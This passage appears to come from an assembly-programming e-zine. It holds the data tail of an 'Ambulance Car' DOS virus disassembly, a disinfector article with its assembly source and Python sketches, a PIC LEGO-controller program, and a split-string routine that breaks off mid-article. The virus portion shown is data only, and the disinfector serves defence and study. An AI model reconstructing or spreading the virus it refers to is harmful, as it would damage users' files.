                db        0E9h, 0EAh, 0EBh, 0ECh, 0EDh, 0EEh, 0EFh
   fifth_line    db        26h, 0E6h, 0E7h, 29h, 59h, 5Ah, 2Ch, 0ECh, 0EDh, 0EEh
                db        0EFh, 0F0h, 32h, 62h, 34h, 0F4h

; Here's how the ambulance looks (CP437 block characters):
;
;          \|/
;  ▄▄▄▄▄▄▄▄█▄▄▄
;  ████▀ ▀███  \
;  █████▄█████████
;  ▀▀ OO ▀▀▀▀▀ O ▀

counter            dw        9

jump_code:
near_jump        db        0E9h
relative_offset db        36h, 00h

first_3bytes    db        3       dup       (?)

file_handle        dw        ?

virus_body:

original_3bytes db        0CDh, 20h                ; 'int 20h' opcode
                db        90h                        ; 'nop' opcode


;--- Stuff that gets saved along with the virus ends here

six_bytes        db        6        dup        (?)

filename_ptr    dw        ?

DTA_seg            dw        ?
DTA_off            dw        ?

file_mask:
filename:
pathname        db        6        dup        (?)
                db        7        dup        (?)
                db        67        dup        (?)

new_DTA:
   reserv        db        21        dup        (?)
   f_attr        db        ?
   f_time        dw        ?
   f_date        dw        ?
   f_size        dd        ?
   f_name        db        13        dup        (?)
   filler        db        85        dup        (?)


_TEXT            ends
                end        ambulance_car
---------------------------------------------------------------------------8<--
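
For readers who would rather not assemble the virus just to see the picture,
the decoding done by decode_character can be replayed on paper or in a few
lines of script. The following is only a sketch in Python (not part of the
original listing): the data bytes are copied from ambulance_data above, the
function name decode() is made up for illustration, and the result is
interpreted as code page 437 text, which is an assumption about the display.

```python
# Sketch: replay decode_character on the ambulance_data table.
# Data bytes are copied from the listing; decode() is a hypothetical helper.
AMBULANCE_DATA = [
    [0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x66, 0x87, 0x3B,
     0x2D, 0x2E, 0x2F, 0x30, 0x31],
    [0x23, 0xE0, 0xE1, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7,
     0xE7, 0xE9, 0xEA, 0xEB, 0x30, 0x31, 0x32],
    [0x24, 0xE0, 0xE1, 0xE2, 0xE3, 0xE8, 0x2A, 0xEA, 0xE7,
     0xE8, 0xE9, 0x2F, 0x30, 0x6D, 0x32, 0x33],
    [0x25, 0xE1, 0xE2, 0xE3, 0xE4, 0xE5, 0xE7, 0xE7, 0xE8,
     0xE9, 0xEA, 0xEB, 0xEC, 0xED, 0xEE, 0xEF],
    [0x26, 0xE6, 0xE7, 0x29, 0x59, 0x5A, 0x2C, 0xEC, 0xED, 0xEE,
     0xEF, 0xF0, 0x32, 0x62, 0x34, 0xF4],
]


def decode(data):
    """Return the five screen lines as strings (CP437 interpretation)."""
    rows = []
    for line, row in enumerate(data):
        cl = 5 - line  # CX counts 5, 4, 3, 2, 1 as the lines go down
        # Same arithmetic as the listing: sub al,7 / add al,cl / sub al,dl
        codes = bytes((b - 7 + cl - col) & 0xFF for col, b in enumerate(row))
        rows.append(codes.decode("cp437"))
    return rows
```

Printing "\n".join(decode(AMBULANCE_DATA)) on a Unicode-capable terminal
should draw the ambulance, with the half and full block characters standing
in for the DOS originals.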


Special Thanks
--------------
I would like to thank Cicatrix for sending me his collection of 'Ambulance Car'
strains, so that I would have more than two variants to study and compare.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                    'Ambulance Car' Disinfector
                                                    by Chili


Since I provided a ready-to-be-assembled virus in the "'Ambulance Car'
Disassembly" article, I decided to also write a bonus article with a basic
disinfector for it. Please note that this disinfector doesn't locate and clean
all existing 'Ambulance Car' strains, though it does work on more than half of
the strains I have (thanks Cicatrix). It is only intended to work with the
strain I provided, so no assurances are given as to whether it will do the job
with other strains. It also works with the 'RedXAny' strain look-alike and with
the tamed version that only displays the payload. This tamed version really
isn't a virus, since it doesn't replicate, and so F-PROT won't report it; the
disinfector does report and clean it, though.

An infected file can easily be cleaned by hand, so you should try that first.
The disinfector will scan all .COM files in the current directory for three
things:

  1. the '0E9h' near jump code (other strains may have the '0EBh' jump code;
     this won't detect them!);
  2. the delta offset calculation routine pointed to by the near jump;
  3. the ambulance data at the end of the virus (if you change this into
     something else the disinfector will report the file as suspicious).

Upon a suspicious or infected file report the user will be given a chance to
clean it or continue on to the next file.
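
The three checks can also be written down as a short sketch working on the
bytes of a .COM file. This is a Python illustration, not the disinfector
itself: the function name classify() and its return strings are made up, and
the signature bytes are taken from the compare instructions in the listing
that follows (E8 01 00 01 5E 81 EE for the delta offset code, and 34 F4 found
15 bytes before the end of the file for the ambulance data).

```python
# Sketch of the disinfector's three checks; names are hypothetical.
DELTA_CODE = bytes([0xE8, 0x01, 0x00, 0x01, 0x5E, 0x81, 0xEE])
DATA_TAIL = bytes([0x34, 0xF4])  # last two bytes of ambulance_data


def classify(image: bytes) -> str:
    """Return 'not detected', 'suspicious' or 'infected' for a .COM image."""
    # 1. the file must start with a near jump (0E9h)
    if len(image) < 3 or image[0] != 0xE9:
        return "not detected"
    # 2. the jump must land on the delta offset calculation code
    target = (int.from_bytes(image[1:3], "little") + 3) & 0xFFFF
    if image[target:target + 7] != DELTA_CODE:
        return "not detected"
    # 3. the end of the ambulance data sits 15 bytes before the end of file
    if len(image) >= 15 and image[-15:-13] == DATA_TAIL:
        return "infected"
    return "suspicious"
```

A file that passes checks 1 and 2 but fails check 3 is reported as suspicious,
which mirrors the behaviour described above.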

And here is the disinfector:

[NOTE: F-PROT will report this as a new or modified variant of SillyC - go
       figure!]

--8<---------------------------------------------------------------------------

; 'Ambulance Car' Disinfector
; KILLREDX by Chili for APJ #6
; Assemble with (TASM 4.1):
;        tasm /ml /m2 killredx.asm
;        tlink /t killredx.obj


LF                equ        0Ah                ; 'Line Feed' ASCII code
CR                equ        0Dh                ; 'Carriage Return' ASCII code


_TEXT            segment word public 'code'
                assume    cs:_TEXT, ds:_TEXT, es:_TEXT, ss:_TEXT

                org        100h

killredx        proc    far

;--- Print program identification message

                lea        si, killredx_msg
                call    print_ASCIIZ

;--- Find first .COM file

                lea        dx, com_mask
                xor        cx, cx
                mov        ah, 4Eh
                int        21h
                jnc        open_file
                jmp        exit

open_file:

;--- Print found file's name

                lea        si, newline_msg
                call    print_ASCIIZ
                mov        si, 9Eh                ; Filename in default DTA (80h+1Eh)
                call    print_ASCIIZ

;--- Open found file

                mov        dx, 9Eh
                mov        ax, 3D02h
                int        21h
                jnc        read_jump

;--- Print open error message

                lea        si, open_msg
                call    print_ASCIIZ
                jmp        find_next

read_jump:

;--- Read jump code

                xchg    ax, bx
                mov        cx, 3
                lea        dx, jump_code
                mov        ah, 3Fh
                int        21h
                jc        read_error
                cmp        ax, cx
                je        check_jump
                jmp        close_file

check_jump:

;--- Compare with known virus' jump code

                cmp        byte ptr [jump_code], 0E9h
                je        read_displacement
                jmp        close_file

read_displacement:

;--- Move file pointer to jump offset

                mov        dx, word ptr [jump_code+1]
                add        dx, 3
                xor        cx, cx
                mov        ax, 4200h
                int        21h

;--- Read displacement calculation code

                mov        cx, 7
                lea        dx, displace_code
                mov        ah, 3Fh
                int        21h
                jc        read_error
                cmp        ax, cx
                je        check_displacement
                jmp        close_file

check_displacement:

;--- Compare with known virus' displacement calculation code
;    (E8 01 00 = call $+4, skipping one 01h byte; 5E = pop si;
;     81 EE = sub si, imm16)

                cmp        word ptr [displace_code], 01E8h
                jne        exit_check
                cmp        word ptr [displace_code+2], 0100h
                jne        exit_check
                cmp        word ptr [displace_code+4], 815Eh
                jne        exit_check
                cmp        byte ptr [displace_code+6], 0EEh
                jne        exit_check
                jmp        read_data
exit_check:
                jmp        close_file

read_data:

;--- Move file pointer to supposed data location (15 bytes before EOF)

                mov        cx, 0FFFFh
                mov        dx, 0FFF1h
                mov        ax, 4202h
                int        21h

;--- Read ambulance data

                mov        cx, 2
                lea        dx, ambulance_data
                mov        ah, 3Fh
                int        21h
                jc        read_error
                cmp        ax, cx
                je        check_data
                jmp        close_file

read_error:

;--- Print read error message

                lea        si, read_msg
                call    print_ASCIIZ
                jmp        close_file

check_data:

;--- Compare with known virus' ambulance data

                cmp        word ptr [ambulance_data], 0F434h
                jne        suspicious

;--- Print file infected or suspicious message

                lea        si, infected_msg
                jmp        askto_clean
suspicious:
                lea        si, suspicious_msg

askto_clean:

;--- Print and read answer to whether clean file or not

                call    print_ASCIIZ
                mov        ah, 08h
                int        21h
                cmp        al, 'y'
                je        clean_file
                cmp        al, 'Y'
                je        clean_file
                jmp        close_file

clean_file:

;--- Move file pointer to supposed original bytes location (EOF - 3)

                mov        cx, 0FFFFh
                mov        dx, 0FFFDh
                mov        ax, 4202h
                int        21h

;--- Read host's original (first 3) bytes

                mov        cx, 3
                lea        dx, original_bytes
                mov        ah, 3Fh
                int        21h
                jc        read_error
                cmp        ax, cx
                je        write_original
                jmp        close_file

write_original:

;--- Move file pointer to beginning of file

                xor        cx, cx
                xor        dx, dx
                mov        ax, 4200h
                int        21h

;--- Write original bytes

                mov        cx, 3
                lea        dx, original_bytes
                mov        ah, 40h
                int        21h
                jc        write_error
                cmp        ax, cx
                je        truncate_file

write_error:

;--- Print write error message

                lea        si, write_msg
                call    print_ASCIIZ
                jmp        close_file

truncate_file:

;--- Move file pointer to virus' jump offset (real virus start)

                mov        dx, word ptr [jump_code+1]
                add        dx, 3
                xor        cx, cx
                mov        ax, 4200h
                int        21h

;--- Truncate file

                mov        cx, 0
                mov        ah, 40h
                int        21h
                jc        write_error
                cmp        ax, cx
                jne        write_error

                lea        si, disinfected_msg
                call    print_ASCIIZ

close_file:

;--- Close file

                mov        ah, 3Eh
                int        21h

find_next:

;--- Find next matching file

                mov        ah, 4Fh
                int        21h
                jc        exit
                jmp        open_file

exit:

;--- Exit to DOS

                lea        si, newline_msg
                call    print_ASCIIZ
                retn

killredx        endp


print_ASCIIZ    proc    near

;--- Print an ASCIIZ string

                lodsb
                cmp        al, 0
                je        end_ASCIIZ
                xchg    al, dl
                mov        ah, 02h
                int        21h
                jmp        print_ASCIIZ
end_ASCIIZ:
                retn

print_ASCIIZ    endp


killredx_msg    db        "'Ambulance Car' Disinfector", LF, CR
                db        "KILLREDX by Chili for APJ #6", LF, CR, 0
newline_msg        db        LF, CR, 0
infected_msg    db        "  Infected. Clean [y/n]?", 0
suspicious_msg    db        "  Suspicious. Attempt to clean* (* WARNING: file may "
                db        "be corrupted if infected by an unknown/unsupported "
                db        "strain of Ambulance Car) [y/n]?", 0
disinfected_msg db        LF, CR, "  Disinfected.", 0
open_msg        db        LF, CR, "  [ERROR: opening file]", 0
read_msg        db        LF, CR, "  [ERROR: reading from file]", 0
write_msg        db        LF, CR, "  [ERROR: writing to file]", 0
com_mask        db        "*.COM", 0
jump_code        db        3        dup        (?)
displace_code    db        7        dup        (?)
ambulance_data    dw        ?
original_bytes    db        3        dup        (?)

_TEXT            ends
                end        killredx
---------------------------------------------------------------------------8<--
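
The cleaning step itself boils down to two operations: copy the host's saved
first three bytes (the last three bytes of the infected file) back to the
start, and cut the file off where the jump lands. A minimal sketch in Python,
assuming the file has already passed the checks; the function name
disinfect() is made up for illustration.

```python
# Sketch of the cleaning step; disinfect() is a hypothetical helper.
def disinfect(image: bytes) -> bytes:
    """Return the cleaned image of an infected .COM file."""
    # The virus starts where the initial near jump (E9 lo hi) lands.
    virus_start = (int.from_bytes(image[1:3], "little") + 3) & 0xFFFF
    # The host's original first three bytes are the last three of the file.
    original = image[-3:]
    # Restore them and drop everything from the virus start onwards.
    return original + image[3:virus_start]
```

As with the assembly version, nothing here verifies that the saved bytes are
genuine, which is why a merely suspicious file may end up corrupted.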


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                           Assembling for PIC's
                                                           Jan Verhoeven


Below is a piece of assembly language for the MicroChip PIC processor. This
particular program will flash some LED's and activate some relays based on the
status of some control-inputs. The target MCU was the PIC 16C54, one of the
simplest chips in that range.

To give some indication of what we're up to:

  RAM                 25 bytes
  ROM                512 words (of 12 bits each)
  I/O                 12 bits
  Clockspeed          8 kHz (this project, max = 4 MHz)
  Instructions         33
  On-Chip-Stack          2 levels

Compare this to a modern PC clone....


RISC and Harvard architecture.
------------------------------
The PIC line of MCU's are RISC chips built on the Harvard architecture, and
one of the results is that they have separate code and data memories.

Higher PIC's have more features, like INTerrupt sources on 4 or more pins,
internal interrupts etcetera. All models have a watchdog timer (WDT) which
needs to be reset regularly (if enabled) else the MCU will reset itself.


The PIC registers.
------------------
The register architecture of the PIC is somewhat odd to Intel programmers, but
programming resembles that of the Hewlett Packard HP 11 range of calculators.

Here is an overview of the register set. Microchip refers to this as the
"register file".

    file address    name                  comment
    ------------    -------------------   ---------------------------------
        00          indirect addressing   not a real register!
        01          RTCC                  timer counter
        02          PC (or IP)            lower 8 bits of it
        03          STATUS                flags register
        04          FSR                   file select; bank select on 16C57
        05          Port A                has 4 I/O lines
        06          Port B                has 8 I/O lines
        07          Port C                8 I/O, only 16C55 and 16C57
                                          GP register on 'C54 and 'C56
        08          GP register           General purpose register
        ..          ..                    ..
        1F          GP register           General purpose register

Besides these "transparent registers" there are also some hidden registers
(which also are write only...) for processor control. These are:

        TRISA            The "tristate A/B/C" registers determine the status
        TRISB            of each pin of the I/O ports.
        TRISC            A "1" makes it "input" and a "0" makes it an output.

        OPTION            is for controlling the WDT and the RTCC

And there's the ubiquitous "W" register. This is the "Working register" and is
used to haul data back and forth. PIC registers (or "files") cannot process
constants (or "literals"). This can only be done with the W-file. It takes
some getting used to, but the concept is simple and straightforward and
eventually you will get used to it and learn to appreciate it.

From that moment on, you will only have to get used to the fact that data is
not always ending up where you would like to have it. All instructions
between W and F (any register or file) end with a "d" option. If "d" is a "1",
the destination is the file F, if "d" is "0", the result will be stored in the
W file...
This took me some time to get used to and still is the main source of errors.
Apart from having selected the wrong oscillator and not disabling the WDT....
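
To make the "d" option concrete, here is a tiny model of one such instruction
(ADDWF) written in Python. It is only a sketch: the register file is modelled
as a dictionary and the function name addwf() is made up, but the rule it
follows is the one stated above (d = 1 stores in the file, d = 0 stores in W).

```python
# Sketch: model of ADDWF f,d on an 8-bit register file (hypothetical helper).
def addwf(regs, w, f, d):
    """Return the new value of W; regs[f] is updated when d == 1."""
    result = (w + regs[f]) & 0xFF   # 8-bit addition, carry ignored here
    if d == 1:
        regs[f] = result            # destination is the file, W is unchanged
        return w
    return result                   # destination is W, the file is unchanged


regs = {0x0E: 5}
w = addwf(regs, 3, 0x0E, 0)   # W becomes 8, file 0Eh still holds 5
w = addwf(regs, w, 0x0E, 1)   # file 0Eh becomes 13, W stays 8
```

Forgetting the ", 1" on an instruction that was meant to update a counter
leaves the counter untouched and quietly changes W instead.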


The PIC instructions.
---------------------
The instructions for the PIC 16C54 are as follows:

    mnemonic            description
    ----------------    -----------------------------------------
    ADDWF    F, d        d := W + F
    ANDLW    k            W := W AND k
    ANDWF    F, d        d := W AND F
    BCF        F, b        bit b in F is cleared    (i.e. made zero)
    BSF        F, b        bit b in F is set        (i.e. made one)
    BTFSC    F, b        if bit b in F is CLEAR, skip next instruction
    BTFSS    F, b        if bit b in F is SET, skip next instruction
    CALL    k            push PC, PC := k
    CLRF    F            Clear file F
    CLRW                Clear file W
    CLRWDT                Clear watchdog timer
    COMF    F, d        d := NOT F                (1's complement)
    DECF    F, d        d := F - 1
    DECFSZ    F, d        d := F - 1; If 0 => skip next instruction
    GOTO    k            PC := k
    INCF    F, d        d := F + 1
    INCFSZ    F, d        d := F + 1; If 0 => skip next instruction
    IORLW    k            W := W OR k
    IORWF    F, d        d := W OR F
    MOVF    F, d        d := F            (zero flag affected)
    MOVLW    k            W := k
    MOVWF    F            F := W
    NOP                    No operation
    OPTION                OPTION := W
    RETLW    k            W := k, pop PC
    RLF        F, d        d := rotate left through carry (F)
    RRF        F, d        d := rotate right through carry (F)
    SLEEP                enter powerdown mode
    SUBWF    F, d        d := F - W                (2's complement)
    SWAPF    F, d        d := swap-nibbles (F)
    TRIS    F            TRIState information for I/O pins
    XORLW    k            W := W XOR k
    XORWF    F, d        d := W XOR F

Especially the "F, d" construct takes some getting used to.

Below is the source for the "LEGO controller":

--------------------------------------------------------------------------
title    "LEGO 003"
subtitl "control LEGO technic devices"

LIST    P=16C54, R=HEX, F=INHX8M, C=120, E=0, N=80
PIC54    equ        1FFH            ; Define Reset Vectors

RTCC    equ        1h                ; define register designators
PC        equ        2h                ; the program counter is a register as well
STATUS    equ        3h                ; F3 Reg is STATUS Reg.
PORT_A    equ        5h
PORT_B    equ        6h                ; I/O Port Assignments

RTCC_tc equ        0Dh                ; time constant for RTCC
count_1 equ        0Eh                ; delay counters and GP registers
count_2 equ        0Fh

file    equ        1
w        equ        0

flag_0    equ        0                ; input bits in RA port
flag_1    equ        1
flag_2    equ        2
flag_3    equ        3

LED_0    equ        0                ; status led 1, in RB Port
LED_1    equ        1                ; status led 2
RL_1    equ        2                ; relays 1 - 3
RL_2    equ        3
RL_3    equ        4
s_clk    equ        5                ; s_clk input
s_data    equ        6                ; s_data input
go        equ        7

delay    movlw    .100            ; mov W with 100 decimal
        movwf    count_1            ; xfer W to register
dela_1    clrf    count_2            ; count_2 = 0
dela_2    decfsz    count_2, file    ; count_2 = count_2 - 1
        goto    dela_2            ; skip this instruction if count_2 = 0, ...
        decfsz    count_1, file    ; ... ending here: count_1 = count_1 - 1
        goto    dela_1            ; skip this instruction when count_1 = 0
        retlw    0                ; ending here, if so.

flash    bcf        PORT_B, LED_1    ; flash LED's 0 and 1 as an acknowledgement
        bsf        PORT_B, LED_0    ; activate the LED's.
        call    delay            ; wait a while
        bcf        PORT_B, LED_0    ; toggle the LED's
        bsf        PORT_B, LED_1
        call    delay            ; wait a second!
        bcf        PORT_B, LED_1    ; turn LED_1 off as well.
        retlw    0                ; return to caller with W = 0

RT_chk    clrwdt                    ; clear the watchdog timer
        btfsc    RTCC, 7            ; RELAY_3 follows bit7 of RTCC
        bcf        PORT_B, RL_3
        btfss    RTCC, 7
        bsf        PORT_B, RL_3
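        movf    RTCC, w            ; test RTCC (MOVF sets the zero flag)
        skpz                    ; internal macro for BTFSS    STATUS, 2
        retlw    0                ; RTCC not zero: done
        movf    RTCC_tc, w        ; if RTCC is zero, reload it
        movwf    RTCC            ; with the time constant
        retlw    0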

start    clrf    RTCC
        clrf    RTCC_tc            ; clear RTCC and RTCC time constant
        movlw    B'00001111'
        tris    PORT_A            ; define port A as inputs
        movlw    B'11100000'
        tris    PORT_B            ; define port B as I/O
        movlw    B'00110111'
        option                    ; define state of WDT, RTCC and prescaler
        movlw    B'00011100'
        movwf    PORT_B            ; initialize port B
        call    flash            ; signal READY
        call    flash
        btfss    PORT_B, s_clk    ; if s_clkline low, check for mode 2 request
        goto    m_chk
repeat    clrwdt                    ; clear watchdog timer
        call    flash
        movf    PORT_A, w        ; read port A into W
        andlw    3                ; mask off sensor inputs
        skpnz                    ; skip next instruction if NonZero
        goto    set_tc            ; flag_0 and _1 zero => define RTCC time constant
        btfsc    PORT_A, flag_0
        goto    t_left
        btfsc    PORT_A, flag_1
        goto    t_right
        movf    PORT_B, w
        andlw    B'11100000'        ; mask for the s_clk, s_data and go bits (5-7)
        skpnz                    ; if no RESET condition, skip
        goto    start
        call    RT_chk
        goto    repeat

t_left    btfsc    PORT_A, flag_2    ; if in end position, do not turn at all
        goto    l_exit
        bcf        PORT_B, RL_1    ; else set direction for Turn Left
        bsf        PORT_B, RL_2
        bsf        PORT_B, LED_0    ; show direction with LED's
        bcf        PORT_B, LED_1
chk_fl2 btfsc    PORT_A, flag_2    ; wait until home-position is reached
        goto    l_exit            ; if so, get out
        call    RT_chk            ; if not, check again
        goto    chk_fl2            ; until done
l_exit    bsf        PORT_B, RL_1    ; release relay 1
        bcf        PORT_B, LED_0    ; extinguish light 0
        goto    repeat            ; jump back

t_right btfsc    PORT_A, flag_3    ; if in end position, do not turn at all
        goto    r_exit
        bcf        PORT_B, RL_2    ; else set direction for Turn Right
        bsf        PORT_B, RL_1
        bsf        PORT_B, LED_1    ; show direction with LED's
        bcf        PORT_B, LED_0
chk_fl3 btfsc    PORT_A, flag_3    ; wait until home position reached
        goto    r_exit
        call    RT_chk
        goto    chk_fl3
r_exit    bsf        PORT_B, RL_2    ; deactivate lights and relays
        bcf        PORT_B, LED_1
        goto    repeat

m_chk    clrf    count_1            ; check inputs and make sure there's no glitch
        clrf    count_2
m_chk_1 btfss    PORT_B, s_clk
        decf    count_1, file    ; count pulses s_clkline = low
        decfsz    count_2, file
        goto    m_chk_1
        movf    count_1, w        ; w = low-pulses
        subwf    count_2, w        ; if count_1 <> count_2, glitch occurred
        skpz
        goto    start

set_tc    movf    RTCC, w            ; move current value of RTCC
        movwf    RTCC_tc            ; to time constant register
        goto    repeat

        org        PIC54            ; goto highest word in code space
        goto    start            ; and place the reset vector.

        end

--------------------------------------------------------------------------

If you ever programmed an HP 11 (or 12, 15 or 16) calculator, the conditional
jumps may ring a bell. I don't know how the HP machines handle these jumps,
but the PIC line does the following:

      condition            action by PIC
      ---------            -----------------------------------
        FALSE            execute next instruction
        TRUE            replace next instruction with a NOP

This enables the programmer to make 100% accurate timing loops, since a FALSE
and a TRUE condition take the same amount of time.

The size of this piece of code is easy to calculate: each line with a
mnemonic is one instruction word. This makes 115 words out of the 512-word
program memory space, so we have nearly 400 instruction words left unused.

The PIC's are marvelous chips to bridge the gap between lots and lots of TTL
chips and the overkill of a microcontroller unit with separate RAM, ROM and
I/O. If you want to find out more about this kind of CPU, visit the website at

        http://www.microchip.com

for PDF datasheets and more. Scenix also has a range of clones out right now.
They are software compatible but offer more hardware features, which is not
difficult since the codeword in the design of the PIC's seems to have been
KISS.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                              Splitting Strings
                                                              by mammon_

Those familiar with Perl will undoubtedly have used its split() function, which
takes a single string and splits it into multiple strings or into an array,
based on a delimiter character specified in the call. Typical invocations of
split() would be:

     ($field1, $field2, $junk) = split(':', $line, 3);
     @array = split(' ', $line);

In the first line, the source string is split into a maximum of 3 substrings,
creating a new string each time it encounters a colon character; note that the
third string, $junk, contains the entire rest of the string -- only the first 2
colons will be parsed. (The limit of 3 has to be given explicitly: without it,
Perl splits off one field more than there are variables and throws the surplus
away, so $junk would receive the third field only.) In the second line, an
array of strings is created by splitting the source string at whitespace; since
the number of destination strings is not specified, the array will contain one
element for each substring [read: each string created by splitting the original
at a run of whitespace characters].

Strings and string parsing are notably tedious in assembly. After learning Perl,
I found that the pseudocode for many of my asm programs started to include a
few calls to 'split', since it is a handy one-line method of string parsing,
applicable to processing command lines, user input, and data files. As a result,
it quickly became necessary to write such a routine.

Because asm has no inherent array or string tokenizing support, there are
many possible approaches to string splitting. The most immediate problem
is that the split() routine does not know in advance how many substrings it
will be creating, so there is a temptation to code a strtok() replacement, such
that the first call returns the first substring, and subsequent calls each
return the next substring until the end of the string has been reached:

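          mov ecx, ptrArray
          push dword ptrString
          push dword [delimiter]
          call split              ;first call returns the first substring
          mov [ecx], eax
          add ecx, 4              ;advance to the next array slot
.loop:
          call split              ;later calls return the next substring
          test eax, eax           ;NULL means end of string
          jz .end
          mov [ecx], eax
          add ecx, 4
          jmp .loop
.end: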

This allows for control over the number of substrings created by only calling
split() the desired number of times; however this method also requires a lot
of caller-side work --setting up an array, moving the string pointer returned
in eax to an appropriate array position, and keeping track of the number of
array elements. It is also noticeably more clumsy than the Perl version.
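
For comparison, this is roughly what that caller-side bookkeeping looks like
in C, using the standard library's strtok(). It is only a sketch: the helper
name collect_tokens and its parameters are made up for this illustration, and
strtok() differs from Perl's split in that it skips empty fields.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: stores up to 'max' token pointers from 'line'
 * in 'out' and returns how many were stored. strtok() modifies 'line'
 * in place, so it must be writable. */
size_t collect_tokens(char *line, const char *delims, char **out, size_t max)
{
    size_t n = 0;
    char *tok;

    assert(line != NULL && delims != NULL && out != NULL);

    /* the first call passes the string, later calls pass NULL */
    for (tok = strtok(line, delims); tok != NULL && n < max;
         tok = strtok(NULL, delims)) {
        out[n++] = tok;     /* the caller tracks the slot and the count */
    }
    return n;
}
```

A caller would hand in a writable copy of the line, for instance
collect_tokens(line, ":", fields, 8), and still has to own both the array
and the element count itself.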

Another method would be to mimic the Perl function entirely, and have split()
return an array of substrings:

          push dword ptrString
          push dword [delimiter]
          call split
          mov [ptrStringArray], eax

This is obviously more elegant on the caller side, but it has a few subtle
problems: first, control over how many elements are split off is lost;
secondly, the array is of indefinite element size [i.e., one would have to
scan each string again in order to find its end and thus the next string];
and lastly, the duplication of the string in memory is somewhat of a waste.

The C language has more or less created a string standard in which strings are
terminated with a null ['\0' or 0x0] character. Most library or OS functions
to which the split strings will be passed tend to expect this termination; thus
each substring is going to have a termination byte added. However, this termin-
ation byte can replace the delimiter for each substring, thus allowing the
original string itself to serve as the array of substrings after the split
function. Thus, all that is required from the split function is to return an
array of dword pointers into the original string, and a count of the array
elements [substrings]:

          push dword ptrString
          push dword [delimiter]
          call split
          mov [ptrStringArray], eax
          mov [StringArrayNum], ebx

The split function will have to create a DWORD element for each substring
it splits; while this is somewhat wasteful, it is still less expensive than
copying the entire string a second time, unless the string is composed of
1-3 byte substrings. In order to control the number of splits, a 'max_split'
parameter will have to be added to the split() routine, such that if max_split
is NULL, the split() routine will return the maximum possible number of
substrings; if max_split is non-NULL, split() will return max_split or fewer
substrings.

The complete split routine is as follows:

#--------------------------------------------------------------------split.asm
;     split( char, string, max_split)
;      Returns address of array of pointers into original string in eax
;      Returns number of array elements in ebx
;      Behavior:
;            split( ":", "this:that:theother:null\0", NULL)
;            "this\0that\0theother\0null\0"
;            ptrArray[0] = [ptrArray+0] = "this\0"
;            ptrArray[1] = [ptrArray+4] = "that\0"
;            ptrArray[2] = [ptrArray+8] = "theother\0"
;            ptrArray[3] = [ptrArray+C] = "null\0"
EXTERN malloc
EXTERN free

split:
    push ebp
    mov ebp, esp            ;save stack pointer
    mov ecx, [ebp + 8]        ;max# of splits
    mov edi,    [ebp + 12]        ;pointer to target string
    mov ebx, [ebp + 16]        ;splitchar

    xor eax, eax                ;zero out eax for later
    mov edx, esp                ;save current stack pos.
    push edi                    ;save ptr to first substring
    test ecx, ecx               ;is #splits NULL?
    jnz do_split                ;--no, start splitting
    dec ecx                     ;--yes, set to MAX [0xFFFFFFFF]

do_split:
    dec ecx                     ;first substring is already counted
    jz EOS                      ;only one substring wanted: no splitting
.nextchar:
    mov bh, byte [edi]          ;get byte from target string
    cmp al, bh                  ;end of string? [al == 0x0]
    je EOS                      ;--yes, then leave split()
    inc edi                     ;next char
    cmp bl, bh                  ;was it the delimiter?
    jne .nextchar               ;--no, keep scanning
    mov byte [edi - 1], al      ;--yes, replace delimiter with "\0"
    push edi                    ;save ptr to next substring
    loop .nextchar              ;loop #splits or till EOS

EOS:
    mov ecx, edx                ;edx, ecx == original stack position
    sub ecx, esp                ;get total size of pushed pointers
    push ecx                        ;save size
    call malloc                    ;allocate that much space for array
    test eax, eax
    jz .error
    pop ecx                        ;restore size
    mov edi, eax                ;set destination to beginning of array
    add edi, ecx                ;move to end of array
    shr ecx, 2                    ;divide total size/4 [= # of dwords to move]
    mov ebx, ecx                ;save count

.store:
    sub edi, 4                    ;move to beginning of dword
    pop dword [edi]                ;pop from stack to array
    loop .store

.error:
    mov esp, ebp
    pop ebp
    ret                            ;eax = array[0], ebx = array count
#------------------------------------------------------------------------EOF

The use of the stack in this routine may be a little unclear. Each time a
delimiter is encountered, a pointer to the character after the delimiter
is pushed onto the stack:
          this:that:theother\0
          ^----------------------This is pushed at the very beginning.
                                 Element#: array[0]
          this\0that:theother\0
                ^----------------This is pushed when the first ':' is found.
                                 Element#: array[1]
          this\0that\0theother\0
                      ^----------This is pushed when the second ':' is found.
                                 Element#: array[2]

The stack now looks like this:
          --------------[ebp]
          ptr->string1
          ptr->string2
          ptr->string3
          --------------[esp]
The string pointers are then POPed into the array, starting with array[2] and
ending with array[0].

Once the string is parsed and the pointers are PUSHed to the stack, edi is set
to the address of the array [mov edi, eax] and advanced to the end of the
allocated array [add edi, ecx]. The counter is then set to the number of DWORD
pointers that have been pushed onto the stack [shr ecx, 2]; for each DWORD
pointer, edi is moved back 4 bytes from the end of the array [sub edi, 4]
and the pointer is POPed into that 4 byte space. In the last iteration of the
loop, edi points to the beginning of the allocated array, and the first DWORD
pointer [ array[0] ] is POPed into the first array element.
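
The behaviour of the routine can also be sketched in C. This is not a
translation of the listing: instead of pushing pointers onto the stack it
simply walks the string twice, and the name split_in_place and the count
out-parameter are assumptions made for this sketch.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

/* Sketch of split(): overwrites delimiters in 'str' with '\0' and
 * returns a malloc'd array of pointers into 'str'; the element count
 * is stored in *count. max_split == 0 means "no limit". Returns NULL
 * if malloc fails. The caller frees the array, not the strings. */
char **split_in_place(char delim, char *str, size_t max_split, size_t *count)
{
    size_t n = 1;               /* the first substring always exists */
    size_t i;
    char *p;
    char **array;

    assert(str != NULL && count != NULL);

    /* pass 1: count the substrings, honouring the limit */
    for (p = str; *p != '\0'; p++)
        if (*p == delim && (max_split == 0 || n < max_split))
            n++;

    array = malloc(n * sizeof *array);
    if (array == NULL) {
        *count = 0;
        return NULL;
    }

    /* pass 2: terminate each substring, record where the next starts */
    array[0] = str;
    for (p = str, i = 1; i < n; p++) {
        if (*p == delim) {
            *p = '\0';
            array[i++] = p + 1;
        }
    }
    *count = n;
    return array;
}
```

Called as split_in_place(':', line, 0, &n) on a writable line, it leaves the
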